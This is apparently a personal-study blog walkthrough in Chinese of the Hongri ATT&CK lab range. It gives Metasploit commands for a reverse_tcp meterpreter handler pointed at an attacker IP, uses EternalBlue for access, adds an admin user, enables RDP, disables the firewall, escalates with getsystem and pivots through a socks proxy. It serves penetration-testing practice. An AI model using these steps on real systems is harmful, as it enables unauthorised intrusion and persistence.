红日靶场之sta&&ck远程桌面控制 个人学习)

红日靶场之sta&&ck远程桌面控制 个人学习)_第1张图片

我们首先打开webshell工具

红日靶场之sta&&ck远程桌面控制 个人学习)_第2张图片

然后切换到C盘的www的文件夹下面

然后我们打开MSF工具进行监听

红日靶场之sta&&ck远程桌面控制 个人学习)_第3张图片

红日靶场之sta&&ck远程桌面控制 个人学习)_第4张图片

模板

msfconsole 启动MSF工具

然后是 use exploit/multi/handler 使用漏洞辅助模块

set payload windows/meterpreter/reverse_tcp 这是利用漏洞tcp回弹模块

set lhost 192.168.52.129 这是设置回弹的主机 这里是我们的kali攻击机的ip地址

set lport 12345 这里是设置监听的端口

run 是运行

红日靶场之sta&&ck远程桌面控制 个人学习)_第5张图片

权限反弹

红日靶场之sta&&ck远程桌面控制 个人学习)_第6张图片

我们首先先对内网的用户的主机进行扫描

红日靶场之sta&&ck远程桌面控制 个人学习)_第7张图片

我们看到了如下的开放端口

445 永恒之蓝

打开MSF工具

红日靶场之sta&&ck远程桌面控制 个人学习)_第8张图片

红日靶场之sta&&ck远程桌面控制 个人学习)_第9张图片

用永恒之蓝漏洞拿到了权限

现在我们应该进一步获得一些权限

红日靶场之sta&&ck远程桌面控制 个人学习)_第10张图片

我们首先给那台机器添加一个新用户

红日靶场之sta&&ck远程桌面控制 个人学习)_第11张图片

然后赋予它管理员权限

红日靶场之sta&&ck远程桌面控制 个人学习)_第12张图片

让我们开启3389端口以便于进行远程连接

红日靶场之sta&&ck远程桌面控制 个人学习)_第13张图片

红日靶场之sta&&ck远程桌面控制 个人学习)_第14张图片

关闭防火墙

红日靶场之sta&&ck远程桌面控制 个人学习)_第15张图片

说一下连接的问题  

如果进行远程的连接 

首先我们现在win7服务器中获得权限

当我们通过 meterpreter 界面的话

我们要先输入 getuid 是查看服务器的权限

红日靶场之sta&&ck远程桌面控制 个人学习)_第16张图片

用getsystem进行提权

提权以后用MSF工具进行端口连接

红日靶场之sta&&ck远程桌面控制 个人学习)_第17张图片

用MSF进行连接

首先是用

usae auxiliary/server/socks_proxy

set version 4a

set srvport 2222

run 建立了连接

然后我们还需要进入 vi etc/proxychains4.conf

将里面的连接配置进行更改

然后通过proxychains进行配置连接

然后就可以进行远程的计算机连接了

通过漏洞添加目标机用户,和为用户设置管理员权限、

然后打开对面3389端口,关闭对方防火墙均可以实现

你可能感兴趣的:(学习)